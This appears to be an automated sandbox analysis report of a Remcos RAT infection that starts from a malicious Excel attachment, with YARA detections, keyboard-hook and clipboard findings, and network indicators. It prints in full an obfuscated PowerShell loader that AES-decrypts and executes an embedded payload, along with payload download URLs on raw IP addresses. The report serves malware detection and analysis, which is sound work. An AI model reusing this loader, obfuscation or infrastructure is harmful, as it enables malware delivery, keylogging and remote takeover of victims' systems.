            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Jul 2024 11:08:47 GMTTransfer-Encoding: chunkedConnection: keep-aliveX-Powered-By: ASP.NETCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=J3zRELeiEaDmw4y51hpaSqR5HJUC7tJYsS6NiS8pIdb8C4VnJ%2BAFmlxrWEe4Ehzvc1hOVzJpro8aThAGNaDy1v1Jf1MuEDT6My%2FkHgsficCy1%2BHgs915%2Bj46"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8a93ef0c5a7e7288-EWRalt-svc: h3=":443"; ma=86400Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Jul 2024 11:08:47 GMTTransfer-Encoding: chunkedConnection: keep-aliveX-Powered-By: ASP.NETCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h6f%2BYPJbcgtCcj7FAeR%2B3SmYzifSQgkg5DDsALOW850tHuATRAJEs04PCjkDMyoSDzzcFcXtlXs3y0gZ83gqmPazoOWQlVTepC7Hq1luWpTVG%2F6VaEILJLz5"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8a93ef0d5b577288-EWRalt-svc: h3=":443"; ma=86400Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Jul 2024 11:08:52 GMTTransfer-Encoding: chunkedConnection: keep-aliveX-Powered-By: ASP.NETCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=prf2EfDG%2FCvxWIKSDeHLWKkfPTRVsDRCuAyW86jiVQSWKfa%2B1kiG8tSJiY%2FSvWP3xgtqHIfqHeO7mMkS287lmAmNei3rpT18q%2FqWq1khLz%2BA%2BqJLrw1dVGQ1"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8a93ef29effcc354-EWRalt-svc: h3=":443"; ma=86400Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Jul 2024 11:08:52 GMTTransfer-Encoding: chunkedConnection: keep-aliveX-Powered-By: ASP.NETCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=prf2EfDG%2FCvxWIKSDeHLWKkfPTRVsDRCuAyW86jiVQSWKfa%2B1kiG8tSJiY%2FSvWP3xgtqHIfqHeO7mMkS287lmAmNei3rpT18q%2FqWq1khLz%2BA%2BqJLrw1dVGQ1"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8a93ef29effcc354-EWRalt-svc: h3=":443"; ma=86400Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
            Source: powershell.exe, 0000000A.00000002.440512880.0000000008231000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.176.174
            Source: powershell.exe, 0000000A.00000002.440512880.0000000008231000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.176.174/60/WDER.txt
            Source: EQNEDT32.EXE, 00000008.00000002.423816080.000000000065F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.176.174/60/creatednewwaterbottleforme.gIF
            Source: EQNEDT32.EXE, 00000008.00000002.423816080.000000000065F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.176.174/60/creatednewwaterbottleforme.gIFj
            Source: powershell.exe, 0000000A.00000002.436996063.00000000023DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.46.176.133
            Source: powershell.exe, 0000000A.00000002.436996063.00000000023DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.436404605.0000000000020000.00000004.00000020.00040000.00000000.sdmpString found in binary or memory: http://198.46.176.133/Upload/vbs.jpeg
            Source: RegAsm.exe, RegAsm.exe, 0000000C.00000002.1053847847.0000000000526000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
            Source: powershell.exe, 0000000A.00000002.437191072.0000000003ED8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
            Source: RegAsm.exe, 0000000C.00000002.1053847847.00000000004D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpC)
            Source: RegAsm.exe, 0000000C.00000002.1053847847.00000000004D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpQ)
            Source: powershell.exe, 0000000A.00000002.436709620.00000000005BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.microsoft.cxj
            Source: powershell.exe, 0000000A.00000002.437191072.00000000032C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 0000000A.00000002.436996063.00000000022A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: tny.wtf.url.4.drString found in binary or memory: http://tny.wtf/
            Source: AWD 490104998518.xls, sA.url.4.drString found in binary or memory: http://tny.wtf/sA
            Source: 90530000.0.dr, ~DF86012724870D7705.TMP.0.drString found in binary or memory: http://tny.wtf/sAyX
            Source: powershell.exe, 0000000A.00000002.437191072.00000000032C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 0000000A.00000002.437191072.00000000032C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 0000000A.00000002.437191072.00000000032C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: powershell.exe, 0000000A.00000002.437191072.00000000032C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            barindex
            Contains functionality to register a low level keyboard hook
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0040A2B8 SetWindowsHookExA 0000000D,0040A2A4,0000000012_2_0040A2B8
            Installs a global keyboard hook
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0040B70E OpenClipboard,GetClipboardData,CloseClipboard,12_2_0040B70E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_004168C1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,12_2_004168C1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0040B70E OpenClipboard,GetClipboardData,CloseClipboard,12_2_0040B70E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0040A3E0 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,12_2_0040A3E0

            E-Banking Fraud

            barindex
            Yara detected Remcos RAT
            Source: Yara matchFile source: 10.2.powershell.exe.41fd080.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.powershell.exe.41fd080.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.1053847847.00000000004F1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.437191072.0000000003ED8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3240, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3384, type: MEMORYSTR
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\note\nots.dat, type: DROPPED

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 10.2.powershell.exe.41fd080.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 10.2.powershell.exe.41fd080.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 10.2.powershell.exe.41fd080.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
            Source: 10.2.powershell.exe.41fd080.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 10.2.powershell.exe.41fd080.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 10.2.powershell.exe.41fd080.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
            Source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
            Source: 12.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 12.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 12.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
            Source: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
            Source: 0000000A.00000002.437191072.0000000003ED8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: Process Memory Space: powershell.exe PID: 3240, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: Process Memory Space: powershell.exe PID: 3240, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Process Memory Space: RegAsm.exe PID: 3384, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\creamthingstohappenedgetmebackwithentirethingstogetbackeverythingtounderstandhowmuchpowerfulthingsitis__________wearegreatwithentirethingstobeback[1].doc, type: DROPPEDMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D09A9DB5.doc, type: DROPPEDMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
            Excel sheet contains many unusual embedded objects
            Source: AWD 490104998518.xlsOLE: Microsoft Excel 2007+
            Source: ~DFE4D87C1F83611F19.TMP.0.drOLE: Microsoft Excel 2007+
            Source: 90530000.0.drOLE: Microsoft Excel 2007+
            Microsoft Office drops suspicious files
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\sA.urlJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\tny.wtf.urlJump to behavior
            Very long command line found
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 3116
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 3116Jump to behavior
            Windows Scripting host queries suspicious COM object (likely to drop second stage)
            Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgIDJump to behavior
            Wscript starts Powershell (via cmd or directly)
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI68766530954276373206247047974663CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIdSLZBgRjPNZ/qocg/lH2aZHZ5Jl+3cjSG1p/+zzQRClxM6ERqs615j4oDskIGVeU9U0hKzWE2qLRhN3w3oPnP9D3zRR0BjWDDOAHuyfLsijMtAivmVqnjEhi75GYn/731w2sw2LX9rePUu8MuzZBPukpDJjP40wnUy5RXUPJoZQj2IJHLLwPLeWAVLyYam2ryxj+aZ147db0X48wxpHj1wzIXORWhGABOaWwaSlaHL3gmVyt1aXV7FBFES5QqtebxGfvLhl4iUZNYV88W0LKeIoUGNbEQFkzf13DC0Iby1tFcGdBD33I0Q+W2Tvg+5qcSyDt39hGQc+cPQJW6i+zS5PdayxMRwfx6SHZXH4Wqvwv1PSLLBL05m+vUyyZdWHee1jJZK1IYpJ679FIiTnjUqbP5xka/o9mFQDN8rr6+t3w5UZ8/qZmHx1mVRoEQQE9sfqxRdM4XzLD6zM0xvTyXDiPtOrir9Y56WYwILgvowZC7rtlCr5vnoqSqCeZ+TBUh3I8J+drjXQv5Li4WPY7XJzFYZPaPMsWDQEjc1bMNXhVQ0Ukf2iM7FfM7k6Nze4qwdaBy3eAeQAbrjji8e0i57J7CMED36TsJyhF0u03e/7/3gWxHIosnVfstQl9YchNNE0mcQpHtSiF3PXt9EE9Ulz//7YH3sp7ZQKed24Zy6boPjqU9Ryt/0qHB2CgOA9dDgikPiavuiSSZwbmMVP3wzAzgXN3nBCy0PstnP16FjfPsLfXhDA3NS1dtwaJQ0liDeM77UG2Ki38eJ/rruKe9qgo+FuHe0xchT8/Wf5NVYoxrcASiFgam2A+WOxlafeNmbR8szgcpCGnpZl/NgN6OssaRDn26lO+fP2jr2C/5Yc3McAo0Ld51WdEwKzWP8b1W57wqS7gMMfAyZ4qaXwBt0DPwXCDT4lDwrWOtFJtHKkrSrB29mx+ZSiTGJd4zwLYP4xGKn+mDlT0rPmQDAZM0Hkrfyo5dxlRZHsLsW0XCN3EuXI+4932vGm0QSE+1K4quce5wQtHb1zoJKShclZ3BMUvCdOwmEdkxUQXKG7DtjDx8uVaNsAElTRbqENfoYu9eWmyI9LzKR9oZNPS+COhZr5JHq9hpvTMcsOldartIGHZY80SQMOSaGVIgdyoyJGpNwdUZLlDYe8NYQDaAJUhcq27lHvZkYQVajhD3kDVJQbOIf1lYyaY52Jn1dHnhXGk0nluzd0ilXEHvzPHLaVeocoCd50UQJ+q1KgXN7gS2k+ZoaXgaMSw9ouBoVyLc2V04RD098/AS2dEb2//QHWXG3F0c50KqYP4QoW398pQnbg4M4pJz0UIDlflEkkDinQrkxq/DRVpVBWz7wRUbde9F6yxo/vtkM0dGIR+Udwiy0EWC9HpU+MKlp45fqh0Pc7VyS3cHOu8E4FMallUVE4yfg==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cReP
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI68766530954276373206247047974663CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIdSLZBgRjPNZ/qocg/lH2aZHZ5Jl+3cjSG1p/+zzQRClxM6ERqs615j4oDskIGVeU9U0hKzWE2qLRhN3w3oPnP9D3zRR0BjWDDOAHuyfLsijMtAivmVqnjEhi75GYn/731w2sw2LX9rePUu8MuzZBPukpDJjP40wnUy5RXUPJoZQj2IJHLLwPLeWAVLyYam2ryxj+aZ147db0X48wxpHj1wzIXORWhGABOaWwaSlaHL3gmVyt1aXV7FBFES5QqtebxGfvLhl4iUZNYV88W0LKeIoUGNbEQFkzf13DC0Iby1tFcGdBD33I0Q+W2Tvg+5qcSyDt39hGQc+cPQJW6i+zS5PdayxMRwfx6SHZXH4Wqvwv1PSLLBL05m+vUyyZdWHee1jJZK1IYpJ679FIiTnjUqbP5xka/o9mFQDN8rr6+t3w5UZ8/qZmHx1mVRoEQQE9sfqxRdM4XzLD6zM0xvTyXDiPtOrir9Y56WYwILgvowZC7rtlCr5vnoqSqCeZ+TBUh3I8J+drjXQv5Li4WPY7XJzFYZPaPMsWDQEjc1bMNXhVQ0Ukf2iM7FfM7k6Nze4qwdaBy3eAeQAbrjji8e0i57J7CMED36TsJyhF0u03e/7/3gWxHIosnVfstQl9YchNNE0mcQpHtSiF3PXt9EE9Ulz//7YH3sp7ZQKed24Zy6boPjqU9Ryt/0qHB2CgOA9dDgikPiavuiSSZwbmMVP3wzAzgXN3nBCy0PstnP16FjfPsLfXhDA3NS1dtwaJQ0liDeM77UG2Ki38eJ/rruKe9qgo+FuHe0xchT8/Wf5NVYoxrcASiFgam2A+WOxlafeNmbR8szgcpCGnpZl/NgN6OssaRDn26lO+fP2jr2C/5Yc3McAo0Ld51WdEwKzWP8b1W57wqS7gMMfAyZ4qaXwBt0DPwXCDT4lDwrWOtFJtHKkrSrB29mx+ZSiTGJd4zwLYP4xGKn+mDlT0rPmQDAZM0Hkrfyo5dxlRZHsLsW0XCN3EuXI+4932vGm0QSE+1K4quce5wQtHb1zoJKShclZ3BMUvCdOwmEdkxUQXKG7DtjDx8uVaNsAElTRbqENfoYu9eWmyI9LzKR9oZNPS+COhZr5JHq9hpvTMcsOldartIGHZY80SQMOSaGVIgdyoyJGpNwdUZLlDYe8NYQDaAJUhcq27lHvZkYQVajhD3kDVJQbOIf1lYyaY52Jn1dHnhXGk0nluzd0ilXEHvzPHLaVeocoCd50UQJ+q1KgXN7gS2k+ZoaXgaMSw9ouBoVyLc2V04RD098/AS2dEb2//QHWXG3F0c50KqYP4QoW398pQnbg4M4pJz0UIDlflEkkDinQrkxq/DRVpVBWz7wRUbde9F6yxo/vtkM0dGIR+Udwiy0EWC9HpU+MKlp45fqh0Pc7VyS3cHOu8E4FMallUVE4yfg==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess Stats: CPU usage > 49%
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_004167B4 ExitWindowsEx,LoadLibraryA,GetProcAddress,12_2_004167B4
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_01B72C8810_2_01B72C88
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_01B7968910_2_01B79689
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_01B7593A10_2_01B7593A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0043E0CC12_2_0043E0CC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0041F0FA12_2_0041F0FA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0045415912_2_00454159
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0043816812_2_00438168
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_004461F012_2_004461F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0043E2FB12_2_0043E2FB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0045332B12_2_0045332B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0042739D12_2_0042739D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_004374E612_2_004374E6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0043E55812_2_0043E558
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0043877012_2_00438770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_004378FE12_2_004378FE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0043394612_2_00433946
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0044D9C912_2_0044D9C9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00427A4612_2_00427A46
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0041DB6212_2_0041DB62
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00427BAF12_2_00427BAF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00437D3312_2_00437D33
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00435E5E12_2_00435E5E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00426E0E12_2_00426E0E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0043DE9D12_2_0043DE9D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00413FCA12_2_00413FCA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00436FEA12_2_00436FEA
            Source: AWD 490104998518.xlsOLE indicator, VBA macros: true
            Source: AWD 490104998518.xlsStream path 'MBD001EFDDA/\x1Ole' : http://tny.wtf/sAk1bKFw`:5_WX-{LWFumIifr5j(]NK=g Vye4P@+ u5al(:'w$+VkiP*g%A9b9W"&<rIhwQJ.4A/U4m@Jxp8H4yEFYvgQrWjzm9SQ0JwTkQUC5NsDLgFOFBjRcSfxsZHaTXFjIOic4UdLEthgybjfkc2fUqeHOgC8TptH2Fz5aMrdF6iBYFzcb11flCYx8woBIAH36S1N8G7uMAOQbBIvcfQpWqFzxjro1cxJTuQlwK59zsY4i3eRj8m4MoKHf0LnK5MU5uB4zgIHPCI3Q2p90V]}-[\),:8F
            Source: ~DFE4D87C1F83611F19.TMP.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: ~WRF{2F215D8E-00CF-4E4E-9C6A-7B89408264B1}.tmp.4.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00434E10 appears 54 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00402093 appears 50 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00434770 appears 41 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00401E65 appears 34 times
            Source: 10.2.powershell.exe.41fd080.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 10.2.powershell.exe.41fd080.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
